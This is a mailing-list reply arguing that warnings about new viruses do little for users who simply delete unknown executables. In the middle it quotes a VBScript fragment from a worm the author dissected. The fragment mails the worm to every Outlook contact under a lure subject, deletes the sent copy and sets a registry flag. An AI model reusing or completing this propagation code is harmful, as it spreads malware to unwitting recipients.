Re: [RT] virus IS A HOAX AND NOT A HOAX - Read Symantec Carefully

How does it help you to know a new virus is on the loose?

When you receive a virus, you either a) have virus software or b) you don't.
You either a) execute every executable that drops into your inbox or b) you
don't.

How does knowing there's a new virus out there help you in either respect?
For the record, some pinhead creates a new virus every day!  Does that help
you?

For a long time, I didn't have virus software.  So my procedure for dealing
with unknown or even marginally questionable executables was to hit the DEL
key.  No I have virus software.  You know what my unknown executable
procedure is now?  I HIT THE DEL KEY!!!  I don't care if it's a new virus or
10 years old.  Same procedure.

Actually, I pulled one virus apart because it was VBscript.  Here's some of
the code:

  For Count= 1 To ContactCount
    Set Mail = Outlook.CreateItem(0)
    Set Contact = ListIndex.AddressEntries(Count)
    Mail.To = Contact.Address
    Mail.Subject = "Homepage"
    Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page!
It's really cool ;O)"&vbcrlf&vbcrlf
    Set Attachment=Mail.Attachments
    Attachment.Add Folder & "\homepage.HTML.vbs"
    Mail.DeleteAfterSubmit = True
    If Mail.To <> "" Then
    Mail.Send
    WS.regwrite "HKCU\software\An\mailed", "1"
  End If
  Next

This is the part of the virus (worm in this case) that loops thru your
contacts list, attaches itself to an email with an encouraging subject and
sends itself off.  There.  Does that help you defend yourself in any way?
No!  If your procedures for dealing with suspect email are questionable,
then one day you will probably get infected.  And it doesn't matter whether
you know what kind of virus it is or not.  You can get infected either way.

Kent